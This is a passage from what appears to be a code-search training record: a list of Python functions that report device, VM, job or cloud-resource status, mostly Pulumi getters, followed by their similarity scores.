pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self):\n\n # --- get 0 padded string representation of status register\n response = self.send_lens_cmd(['90', 'B9', '00'], fast_mode=True)\n state_str = bin(int('0x' + response['MISO'][2], 16))\n state_str = state_str[2:]\n for p in range(8 - len(state_str)):\n state_str = '0' + state_str\n\n self._status = dict(AF_switch=bool(int(state_str[0])),\n F_move=bool(int(state_str[5])),\n F_acc=bool(int(state_str[2])),\n FD_endStop=bool(int(state_str[3])),\n status_byte=state_str)\n\n return self._status", "def status(self) -> pulumi.Output['outputs.JobStatus']:\n return pulumi.get(self, \"status\")", "def cpu(self) -> Optional[Any]:\n return pulumi.get(self, \"cpu\")", "def cpu(self) -> Optional[Any]:\n return pulumi.get(self, \"cpu\")", "def checkCpu(self):\n cpu = self.getCpu()\n err_msg = []\n task_result = device_status = 0\n\n if cpu is None:\n err_msg.append('Get CPU info failed')\n task_result = device_status = 1\n else:\n # 以后可扩展告警条件\n pass\n return cpu, err_msg, task_result, device_status", "def get_status(self):\n return self.o.read_register(self.dev_id, STATUS)", "def status(self):\n ret = self.dev.ctrl_transfer(0xc0, 0x01, 0x0081, 0x0000, 0x0001)\n if ret[0] == 0xa0:\n return self.POWER_ON\n return self.POWER_OFF", "def _do_get_status(self):\n logging.info(__name__ + ' : Get status of the device.')\n result = self._execute('X')\n usage = {\n 0: \"Channel not in use\",\n 1: \"Channel used for Nitrogen level\",\n 2: \"Channel used for Helium 
Level (Normal pulsed operation)\",\n 3: \"Channel used for Helium Level (Continuous measurement)\",\n 9: \"Error on channel (Usually means probe unplugged)\"\n }\n # current_flowing = {\n # 0 : \"Curent not flowing in Helium Probe Wire\",\n # 1 : \"Curent not flowing in Helium Probe Wire\"\n # }\n # auto_fill_status = {\n # 00 : \"End Fill (Level > FULL)\",\n # 01 : \"Not Filling (Level < FULL, Level > FILL)\",\n # 10 : \"Filling (Level < FULL, Level > FILL)\",\n # 11 : \"Start Filling (Level < FILL)\"\n # }\n return usage.get(int(result[1]), \"Unknown\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def get_full_juju_status():\n\n status = model.get_status(lifecycle_utils.get_juju_model())\n return status", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def _get_cpu_virtualization(self):\n try:\n cpu_vt = self._get_bios_setting('ProcVirtualization')\n except exception.IloCommandNotSupportedError:\n return False\n if cpu_vt == 'Enabled':\n vt_status = True\n else:\n vt_status = False\n return vt_status", "def get_cpu_mode(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetCpuMode', self.handle)", "def pr_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"pr_status\")", "def GetStatus(self):\r\n return self.status", "def status(self):\n st = ct.c_int()\n self.lib.GetStatus(ct.pointer(st))\n if st.value == 20073:\n return 'Camera is idle, waiting for instructions.'\n elif st.value == 20074:\n return 'Camera is executing the temperature cycle.'\n elif st.value == 20072:\n return 'Acquisition in progress.'\n elif st.value == 20023:\n return 'Unable to meet accumulate cycle time.'\n elif st.value == 20022:\n return 'Unable to meet kinetic cycle time.'\n elif st.value == 20013:\n return 'Unable to communicate with card.'\n elif st.value == 20018:\n return ('Computer unable to read the data via the ISA slot at the '\n 'required rate.')\n elif st.value == 20026:\n return 'Overflow of the spool buffer.'", "def getStatus(self):\n return self.__status", "def get_provisioning_state(self):\n url = \"/api/v1/machine/{}\".format(self.machine_id)\n return self.urlhandler.get(url)", "def VMStatus(self):\n try:\n status = self.vmInstance.get_status()\n LOGGER.info('Current status of virtual machine \"{}\": {}'.format(VM_NAME, status))\n\n except Exception as e:\n status = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting status of virtual machine \"{}\"!'.format(VM_NAME))\n\n return status", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def get_ready_status():\n statusObj = get_server_status(fields=['ready'])\n return statusObj['ready']", "def 
getStatus(self):\r\n return self.controller.getStatus()", "def status(self):\n if self.qemu.is_running():\n status = 0\n self.log.info(\"vm-status\", result=\"online\")\n for device in list(self.qemu.block_info().values()):\n self.log.info(\n \"disk-throttle\",\n device=device[\"device\"],\n iops=device[\"inserted\"][\"iops\"],\n )\n else:\n status = 1\n self.log.info(\"vm-status\", result=\"offline\")\n for volume in self.ceph.volumes:\n locker = volume.lock_status()\n self.log.info(\"rbd-status\", volume=volume.fullname, locker=locker)\n consul = locate_live_service(self.consul, \"qemu-\" + self.name)\n if consul:\n self.log.info(\n \"consul\", service=consul[\"Service\"], address=consul[\"Address\"]\n )\n else:\n self.log.info(\"consul\", service=\"<not registered>\")\n return status", "def __call__(self):\n status = self.os.popen('circusctl status monitor').read().strip()\n\n if status == 'active':\n return True\n elif status == 'stopped':\n return False", "def core_cpu(self):\n return self._dll.JLINKARM_CORE_GetFound()", "def status(self):\n \n tmpl1 = \"\"\"%-20s%-52s[%s]\"\"\"\n tmpl2 = \"\"\"%-20s%-52s\\n\"\"\"\n # print tmpl1 % (\"Machine Name\", \"IP Addresses\", \"Status\")\n # print 80 * \"-\"\n # print self.get_image()\n if self.cloudserver:\n # let's build the IPs first\n status = self.cloudserver.status\n \n else:\n status = \"OFF\"\n\n res2=\"\"\n ip1 = \"%s:%s\" % (self.networks[0], self.ip_addresses[self.networks[0]])\n if len(self.networks) > 1:\n res2 += \"\\n\"\n for network in self.networks[1:]:\n ipstr = \"%s:%s\" % (network, self.ip_addresses[network])\n res2+=tmpl2 % (\"-\", ipstr)\n # print res2\n # if len(self.ip_addresses.keys()) > 1:\n # ip1 = self.ip_addresses.values()[0]\n res1 = tmpl1 % (self.machine_name, ip1, status)\n return res1 + res2", "def status(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"status\")", "def getstatus(self):\n return self.__status", "def status(self):\n return self.get(self._names[\"status\"])", "def get_running_status(self):\n obj = ProcessInfo('jobs')\n process_list = obj.handle_parameter()\n if process_list:\n # get the hostname\n hostname = process_list[0]\n del process_list[0]\n process_list = obj.extract_process(process_list)\n # print 'dict is here$$$$$'\n dict_processor = []\n for proc_val in process_list:\n if proc_val.search_result ==0:\n dict_processor.append({'processor':proc_val.name,'status':'Stopped','PID':str(proc_val.pid)})\n elif proc_val.search_result >=1:\n dict_processor.append({'processor':proc_val.name,'status':'Running','PID':str(proc_val.pid)})\n # dict_processor[proc_val.name] = 'Running'\n # print (\"|%-20s|%-5s|\"%(proc_val.name,proc_val.search_result))\n # print dict_processor\n return dict_processor\n else:\n return False" ]
[ "0.66442674", "0.65349734", "0.6357901", "0.61985266", "0.61985266", "0.6195143", "0.61590946", "0.6113441", "0.6109538", "0.6081476", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.60137796", "0.5999629", "0.5986909", "0.5985036", "0.59819746", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59683776", "0.59665585", "0.59520686", "0.59520686", "0.5946681", "0.5945029", "0.5921645", "0.59178203", "0.5902624", "0.5902624", "0.5902624", "0.59005505", "0.5886418", "0.5878332", "0.58766556", "0.58712393", "0.58698565", "0.58645195", "0.58583975", "0.58542037", "0.58501583", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5837051", "0.58321965", "0.5826144", "0.58252406", "0.5821392", "0.5818871", "0.5816521", "0.5816521", "0.5812639", "0.5805608", "0.57828486" ]
0.692374
0
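A minimal, self-contained sketch of how a status property like the one above might be exercised. Only the proxying of microblaze.state and the three state strings come from the snippet; the MockMicroblaze stand-in and the poll_until_idle helper are assumptions added for illustration.

import time


class MockMicroblaze:
    # Fake processor whose reported state steps RUNNING -> IDLE (assumption).
    def __init__(self):
        self._reads = 0

    @property
    def state(self):
        self._reads += 1
        return "RUNNING" if self._reads < 3 else "IDLE"


class Processor:
    # Mirrors the snippet above: status just proxies microblaze.state.
    def __init__(self):
        self.microblaze = MockMicroblaze()

    @property
    def status(self):
        return self.microblaze.state


def poll_until_idle(proc, timeout_s=1.0, interval_s=0.01):
    # Poll the status property until it reports IDLE or the timeout expires.
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        if proc.status == "IDLE":
            return True
        time.sleep(interval_s)
    return False


print(poll_until_idle(Processor()))  # True once the mock reaches IDLE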
Send a write command to the mailbox.
def write_cmd(self, address, data, d_width=4, d_length=1, timeout=10):
    # Write the address and data
    self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_ADDR_OFFSET, address)
    self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_DATA_OFFSET, data)
    # Build the write command
    cmd_word = get_cmd_word(WRITE_CMD, d_width, d_length)
    self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, cmd_word)
    # Wait for ACK in steps of 1ms
    countdown = timeout
    while not self.is_cmd_mailbox_idle() and countdown > 0:
        time.sleep(0.001)
        countdown -= 1
    # If ACK is not received, alert users.
    if countdown == 0:
        raise RuntimeError("ArduinoDevMode write_cmd() not acknowledged.")
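A minimal, self-contained sketch of the same mailbox handshake against an in-memory mock. Only the overall flow follows the routine above (write the address and data, post a packed command word, poll for an ACK in 1 ms steps, raise on timeout); the bit layout in get_cmd_word, the offset values, and the MockMicroblaze stand-in are assumptions invented for this illustration.

import time

# Assumed opcode, base offset and field offsets -- invented for this sketch.
WRITE_CMD = 0x1
MAILBOX_OFFSET = 0x0000
ADDR_OFFSET, DATA_OFFSET, CMD_OFFSET = 0x0, 0x4, 0x8


def get_cmd_word(cmd, d_width, d_length):
    # Pack opcode, data width and burst length into one word (assumed layout).
    return (d_length << 16) | (d_width << 8) | cmd


class MockMicroblaze:
    # In-memory stand-in that acknowledges a posted command by clearing it.
    def __init__(self):
        self.mem = {}

    def write(self, offset, value):
        self.mem[offset] = value
        if offset == MAILBOX_OFFSET + CMD_OFFSET:
            # A real IOP clears the slot once the command completes;
            # the mock acknowledges immediately.
            self.mem[offset] = 0


def write_cmd(mb, address, data, d_width=4, d_length=1, timeout=10):
    mb.write(MAILBOX_OFFSET + ADDR_OFFSET, address)
    mb.write(MAILBOX_OFFSET + DATA_OFFSET, data)
    mb.write(MAILBOX_OFFSET + CMD_OFFSET, get_cmd_word(WRITE_CMD, d_width, d_length))
    countdown = timeout
    while mb.mem[MAILBOX_OFFSET + CMD_OFFSET] != 0 and countdown > 0:
        time.sleep(0.001)  # poll for the ACK in 1 ms steps
        countdown -= 1
    if countdown == 0:
        raise RuntimeError("write_cmd() not acknowledged.")


write_cmd(MockMicroblaze(), address=0x2000, data=0xAB)
print("acknowledged")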
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, cmd):\n self._chan.send(\"{}\\n\".format(cmd))\n logger.debug(\"sent '{}'\".format(cmd))", "def write(self, cmd):\n if self.tn:\n try:\n self.wlock.acquire()\n if not isinstance(cmd, bytes): cmd = cmd.encode('ascii')\n self.tn.write(cmd)\n except OSError:\n self.close()\n finally:\n self.wlock.release()", "def write(self, msg):\n cmd = self.__compose(msg)\n self.sock.send(cmd)", "def write(self, command: str) -> None:\n self._dmm.write(command)", "def send(self, msg):\n raise NotImplementedError(\"Trying to write to a readonly bus?\")", "def send_command(command):\n print(\"Send: >>> \\n\"+command)\n TOFILE.write(command + EOL)\n TOFILE.flush()", "def write(self, message):\r\n os.write(self.wfid, message.encode('utf-8'))", "def write(self):\r\n assert self.status == SEND_ANSWER\r\n sent = self.socket.send(self.message)\r\n if sent == len(self.message):\r\n self.status = WAIT_LEN\r\n self.message = ''\r\n self.len = 0\r\n else:\r\n self.message = self.message[sent:]", "def sendCommand(self, command):\n finalCommand = struct.pack(\"B\", len(command)) + command\n if self._writeChar is None:\n self._reconnect = True\n self._writeQueue.put(finalCommand)", "def write(self, cmd: bytes) -> None:\n logger.debug(f\"write='{cmd}'\")\n self._con.write(cmd)\n self._con.flush()", "def send(self, msg):\n self._mailbox.put(msg)", "def __write(self, cmd):\n\n if self.__port:\n cmd += b\"\\r\\n\" # terminate\n print(\"write: \" + repr(cmd))\n self.__port.flushInput() # dump everything in the input buffer\n self.__port.write(cmd) # turn the string into bytes and write\n self.__port.flush() # wait for the output buffer to finish transmitting\n else:\n print(\"cannot perform __write() when unconnected\")", "def writeMessage(self,message):\n pass", "def handle_write(self):\n self.initiate_send()", "def write(self, data):\n with self._write_lock:\n self.socket.send(data)", "def send(self, ard: Arduino_functions.Arduino, write_msg_str):\n self.worker_send.queue.put((ard, write_msg_str))\n\n # Trigger processing the worker_send queue.\n self.worker_send.qwc.wakeAll()", "def write(self, msg):\n self.sock.send(msg.encode())", "def send_cmd(self, cmd):\n logger.info(\"sending cmd %s to fuse\", cmd)\n with open(self.ipc + \".\" + str(threading.current_thread().ident), 'w', 0) as f:\n #with open(self.ipc, 'a+') as f:\n f.write(cmd)\n #f.flush()\n logger.info(\"writing to fuse returned\")", "def write(self, msg, *_):\n if self.out is not None:\n self.out.write(msg)\n self.out.flush()", "def handle_write(self):\n #send_types = \" + \".join(\n # messages.get_message_type(message) for message in self.buffer)\n for message in self.buffer:\n if isinstance(message, str):\n self.send(message)\n else:\n self.send(message.pack())\n self.buffer = []\n #print \"To %s:%s sent: \" % (self.address, self.port), send_types", "async def _write_async(self, command: bytes):\n await self._serial.write_async(command)\n logger.debug(f\"Command {repr(command)} sent!\")", "def write(self):\n assert self.status == SEND_ANSWER\n sent = self.socket.send(self.message)\n if sent == len(self.message):\n self._set_status(WAIT_LEN)\n self.message = b''\n self.len = 0\n else:\n self.message = self.message[sent:]", "def send_command(command):\n print(\"Send: >>> \"+command)\n TOPIPE.write(command + EOL)\n TOPIPE.flush()", "async def send_msg(self, msg):\n try:\n logging.info(\"Sending: %s\", msg)\n self.writer.write(msg.encode())\n await self.writer.drain()\n\n except Exception as e:\n logging.error(\"Command could not be encoded; 
%s\", e)", "def _write_message(self, message):\n raw_data = message.serialize()\n debug(\"writing outgoing message of type \" + message.__class__.__name__)\n self.request.sendall(raw_data)", "def write(self, message):\n\n if self.multi_command is not None:\n log.debug(\n 'Writing to multi-command buffer for device \"{0}\": {1!r}'.format(self.name, message))\n\n self.multi_command.append(message)\n return\n\n log.debug('Writing to device \"{0}\": {1!r}'.format(self.name, message))\n\n if self.driver == drivers.pyvisa:\n try:\n self.device.write(message)\n except pyvisa.VisaIOError as e:\n if e.error_code == pyvisa.errors.VI_ERROR_TMO:\n print(\"In pyvisa timeout error\")\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.telnet:\n try:\n self.device.write(message)\n except Exception:\n if e is socket.timeout:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.requests:\n r = requests.get(self.request_address + message)\n if r.status_code != 200:\n raise Exception(\"Write did not work\")\n\n elif self.driver == drivers.lgpib:\n try:\n self.device.write(message)\n except gpib.GpibError as e:\n if 'timeout' in e.message:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.pyvisa_usb:\n # Send the message raw.\n if not (legacyVisa):\n self.device.write_raw(message)\n else:\n pyvisa.vpp43.write(self.device.vi, message)\n\n else:\n print(\"Passed without writing\")", "def write(self, command):\r\n try:\r\n cmd = urllib.parse.quote(command) # escape special chars\r\n req_url = self.url + 'write/' + cmd\r\n requests.get(url=req_url)\r\n except ValueError:\r\n print(\"uart failed write\")", "def _send_command(self, command):\n self._serial_port.write(command + '\\n')\n self._serial_port.flush()", "def write(self, data):\n self._write_lock.acquire()\n try:\n self.socket.sendall(data)\n finally:\n self._write_lock.release()", "async def _send_command(self, command):\n send_message = \"\"\n\n for i in command:\n send_message += chr(i)\n result = None\n for data in send_message:\n try:\n result = await self.write(data)\n except():\n if self.log_output:\n logging.exception('cannot send command')\n else:\n print('cannot send command')\n return result", "def write_message(self, message):\r\n logging.debug(\"Sending message {mes} to {usr}\".format(mes=message, usr=self.id))\r\n self.handler.write_message(message)", "def send_command(self, command):\n send_message = \"\"\n for i in command:\n send_message += chr(i)\n #send_message += bytes(i)\n\n for data in send_message:\n self.pymata.transport.write(data)", "def send_message(self, data):\n self.transport.write(data)", "def send(self, message, callback=None):\n assert isinstance(message, domintell.Message)\n self._write_queue.put_nowait((message, callback))", "def send(self, message, callback=None):\n assert isinstance(message, domintell.Message)\n self._write_queue.put_nowait((message, callback))", "def sendCommand(ser, msg):\n ser.write(\"%s\\r\\n\" % (msg))\n return", "def write(self, line):\n self.sendall(six.text_type(line).encode(self.encoding))", "def write(self, command):\n self.meas.write(bytes(command, \"utf8\"))", "def write(self, cmd):\n if isinstance(cmd, (tuple, list)):\n self.device.write(\";\".join(cmd))\n else:\n self.device.write(cmd)", "def send_command(command):\n\tmessage = json.dumps (command)\n\tbottle = local_out_port.prepare()\n\tbottle.clear()\n\tbottle.addString(message)\n\tlocal_out_port.write(False)", "def write(self, out, message):\n if out != None:\n 
out.write(message)", "def SERIAL_SEND_cmd(self, cmd):\n # Must be connected & operational\n if self.State == 0:\n # a slightly more informative result might help\n return \n\n # SEND\n if self.Port.writable():\n #print \"\\nwriting \" + cmd + \" to port...\"\n for c in str(cmd):\n self.Port.write(c)\n self.Port.write(\"\\r\\n\")\n\n return", "def write(self, msg):\n # Transmit messages using the serial connection. Encodes strings to byte-arrays\n self.Serial.write(msg.encode('ascii'))", "def send_command(self, data, read_delay=1):\n self._write(data)\n if read_delay:\n time.sleep(read_delay)\n return self._read()", "def write(self, command):\n if not command.endswith('\\n'):\n command += '\\n'\n self.rpc.call(MsfRpcMethod.ConsoleWrite, [self.cid, command])", "def write_message_to_pipe(writehandle, channel, data):\n # Construct the dictionary\n mesg_dict = {\"ch\":channel,\"d\":data}\n\n # Convert to a string\n mesg_dict_str = marshal.dumps(mesg_dict)\n\n # Make a full string\n mesg = str(len(mesg_dict_str)) + \":\" + mesg_dict_str\n\n # Send this\n index = 0\n while index < len(mesg):\n bytes = os.write(writehandle, mesg[index:])\n if bytes == 0:\n raise EnvironmentError, \"Write send 0 bytes! Pipe broken!\"\n index += bytes", "def send(self, message):\n\n if self._inchild:\n os.write(self._general_pw_child, message)\n else:\n os.write(self._general_pw_parent, message)", "def on_write(message):\n print('Write received', message)\n body = json.loads(message.body)\n try:\n db_write(body['key'], body['value'])\n finally:\n message.ack()", "def reply_message(self, message):\n\n message = str(message).format(self.path).encode('utf-8')\n self.wfile.write(message)", "def send(self,msg):\n try:\n if self.mutexCmd.tryLock(100):\n self.cmd.append(msg)\n self.mutexCmd.unlock()\n #print(\"ADD TO QUEUE: {}\".format(msg))\n else:\n print(\"WARN: cmd not added to queue\")\n except Exception as e:\n print(\"ERROR:Serial:send:\",e)\n self.ConnexionError.emit(True)", "async def write(self, towrite: bytes, await_blocking=False):\n\n await self._write(towrite)\n\n # Wait for the output buffer to be flushed if requested\n if await_blocking:\n return await self.flush()", "def write(self, command):\n self.cmd_emiter.emit(str(command))\n self.meas.write(command)", "def send_command(self, data):\n try:\n self.write(data)\n reply = self.read_line()\n \n if reply == \"{}\":\n pass\n else:\n print \"send_command: received bad reply %s\" % (reply)\n sys.exit(1)\n except Exception:\n raise", "async def write(self, msg: Union[str, bytes]) -> None:\n if isinstance(msg, bytes):\n self.writer.write(msg)\n else:\n self.writer.write(msg.encode(\"utf-8\"))\n self.writer.write(b\"\\n\")\n await self.writer.drain()", "async def _send_command(self, command):\n send_message = \"\"\n\n for i in command:\n send_message += chr(i)\n result = None\n for data in send_message:\n if self.serial_port is not None:\n try:\n result = self.write(data)\n except():\n logerr('Cannot send command')\n return result", "def send(self, message):\n pass", "def send(self, command):\n self.transport.write(command.to_json())\n self.transport.write(\"\\n\")", "def _write(self, location, data):\n self._connector.write(location=location, data=data)", "def _write(self, data):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n if len(data + b'\\r\\n') > self.MAX_MESSAGE_SIZE:\n logger.error(\n \"A message wasn't sent to %r because it was larger than %d \"\n \"bytes (that is MAX_MESSAGE_SIZE). 
Consider raising that \"\n \"value if the message seemed legit.\", self._repr_remote(),\n self.MAX_MESSAGE_SIZE)\n # No need to call finalize.\n raise IOError(\"Message too long.\")\n\n try:\n with self._write_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n # Does the same as self._socket.sendall.\n self._writer.write(data + b'\\r\\n')\n self._writer.flush()\n except socket.error as error:\n self.finalize(\"Write failed.\")\n logger.warning(\"Failed writing to socket: %s.\", error)\n raise error", "def write(self, buffer):\n self.msg(\"send %r\", buffer)\n self.channel.sendall(buffer.decode())", "def write(self,command,ser = None):\n if ser is None:\n ser = self.ser\n if ser is not None:\n self.flush(ser = ser)\n ser.write(command)\n debug(\"%s: Sent %r\" % (ser.name,command))", "def send_as_server(self, command, msg):\n self._write(f':{self.server.name} {command} {msg}')", "def send_command(self, command):\n question = jbus.jbus_generator_data_write(self.node, 0x15b0, bytes([0x00,command]))\n answer = self.send_request(question)\n #print(\"Question: [\", question, \"]\")\n #print(\"Answer: [\",answer,\"] LEN: \",len(answer))\n return self.verify_response(question, answer)", "def send_command(self, cmd):\n\n\t\tself.eyetribe._connection.request(cmd)", "def _send(self, command, payload):\n self.work_queue_client.send(command, payload)", "def write(self, command):\n self.stdin_stream.write(command)\n self.stdin_stream.flush()", "def __write(self, command):\n command += \"\\00\"\n self.file_write.write(command.encode('latin-1'))", "def _send_command(self, command):\n command_sequence = [command, self._checksum(command)]\n\n for retry in range(0, self.__RETRY_MAX_NUM):\n bytes_sent = self._port_handle.write(command_sequence)\n if bytes_sent != len(command_sequence):\n raise DfuException('Serial port write error: tried to send {} '\n 'bytes, but {} was '\n 'sent.'.format(len(command_sequence),\n bytes_sent))\n\n if self._is_acknowledged():\n break\n\n self._port_handle.flushInput()\n self._port_handle.flushOutput()\n else:\n raise DfuException(\n 'Command {} failed after '\n '{} retries.'.format(hex(command), retry + 1))", "def write(self, command):\n # Write command in bytes plus newline then flush.\n self.proc.stdin.write(bytes(command + \"\\n\", 'ascii'))\n self.proc.stdin.flush()\n\n self.genout()", "def send_command(self, cmd):\n self.mgen_pipe.Send(cmd)", "def send_message(self, cmd_id, message_type, status, message=None):\n pass", "def ftp_write(slot: int, data: bytes, **ftp_options) -> str:\n return _ftp_readwrite(slot, False, data, **ftp_options)", "def write(message):\n __terminalState.osSupport.print(message)", "def send_command(self):\n if self.serial.is_open:\n try:\n # Unicode strings must be encoded\n data = bytes(self.command + '\\r\\n', encoding='utf-8')\n self.serial.flushInput()\n self.serial.write(data)\n except Exception as ex:\n self.handle_serial_error(ex)\n else:\n raise IOError('Try to send data when the connection is closed')", "def write(self, msg):\n if self._writer is None:\n raise NotImplementedError(\"Function not available while socket is closed.\")\n self._writer.write(msg)\n self._writer.flush()", "def send(self, data):\r\n\r\n self._serial_object.write(data)", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n 
TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def send(self, command):\n if hasattr(self, 'connection'):\n if self.connection.is_open:\n cmd = '<'+command+'>'\n # bytestring conversion\n bytestr = str.encode(cmd)\n self.connection.write(bytestr)\n else:\n # TODO be more explicit what failed to be sent\n utils.printer(\"%s is not connected\" % self.name, 'error')", "def sendChatMessage(self, msg):\n self.transport.write(msg)", "def write():\n pass", "def SendCommand(self,command):\n\t\tself.acad.ActiveDocument.SendCommand(command)", "def _send_command(self, command, data=None):\n self._spi_write(_SPI_COMMAND, [command])\n if data is not None:\n self._send_data(data)", "def write(self, command):\n self.meas.write(command)", "def send_and_flush(self, msg):\r\n try:\r\n self.bus.send(msg)\r\n msg.data[:4] = bytearray(4)\r\n # print(\"Message sent on {}\".format(self.bus.channel_info))\r\n except can.CanError:\r\n print(\"Message NOT sent\")", "def write(self):\n # build up all commands into a single request to increase network perf\n connection = self.connection\n commands = self.commands\n try:\n connection.send_packed_command(connection.pack_commands([c.args for c in commands]))\n except ConnectionError as e:\n for c in commands:\n c.result = e", "def check_write_command(self, line):\n self.E_str = \"check_write_command\"\n err_msg = \"The write command takes the syntax:\\n\\n\\twrite <data_name> <filepath>\"\n err_msg += \"\\n\\nor you could specify the type of file to write via:\\n\\n\\t\"\n err_msg += \"write <data_name> <filepath> as <file_type>\"\n\n words = line.split()\n if len(words) != 3 and len(words) != 5:\n self.print_error(err_msg)\n words[1] = words[1].lstrip('$')\n line = ' '.join(words)\n\n line, any_vars = self.find_vars_in_str(line)\n words = line.split()\n words = self.fix_words(words)\n\n # Check the variable to be written actually exists\n if words[1] not in self.variables:\n self.print_error(f\"I can't find the data named: '{words[1]}'\")\n\n # Check we know how to write the requested filetype\n if len(words) == 5:\n if words[4] not in f_dicts.write_fncs:\n err_msg = \"I don't know how to write that type of file.\\n\\n\"\n err_msg += \"Please use one of:\\n\\t*\"\n err_msg += \"\\n\\t*\".join(list(f_dicts.write_fncs.keys()))\n self.print_error(err_msg)\n\n 
self.files_written.append(gen_parse.rm_quotation_marks(words[2]))\n\n # Need to check requested filetype and if that isn't in write_fncs then raise Error", "def sendCommand(self,command,message):\n \n msg_temp = command + \" \" + message +'\\n'\n msg = msg_temp.encode('UTF-8')\n self.socket.send(msg)", "def sendCommand(self,command,message):\n \n msg_temp = command + \" \" + message +'\\n'\n msg = msg_temp.encode('UTF-8')\n self.socket.send(msg)", "def send_message(self, message):\n pass", "def write(self, command):\n self.meas.write(command)", "def writeln(message):\n write(message + \"\\n\")", "def sendCommand(self, command:str=\"?\"):\n self.commandQueue.put(command)\n #self.queueLock.release()\n pass", "def send_command(self, command):\n self.enable_serial_port(self.port)\n time.sleep(.2)\n self.serial_com.write(command.encode() + b'\\r\\n')\n time.sleep(.2)", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def __send(self, cmd, delay=.1):\n\n self.__write(cmd)\n\n if delay is not None:\n print(\"wait: %d seconds\" % delay)\n time.sleep(delay)\n\n return self.__read()", "def async_write(self, data) -> None:\n if data and self.__is_active:\n # logging.info('async_write: ' + str(data))\n self.__client_socket.async_write_all(data, self.__async_write_callback)\n\n # logging.info('async_write done')", "def send(self, send_to, subject):\n self.server.send_message(self, send_to, subject)", "def setWriteOp(self, writeBuffer):\r\n try:\r\n self._checkAssert(0)\r\n self.writer = self.tlsConnection.writeAsync(writeBuffer)\r\n self._doWriteOp()\r\n except:\r\n self._clear()\r\n raise" ]
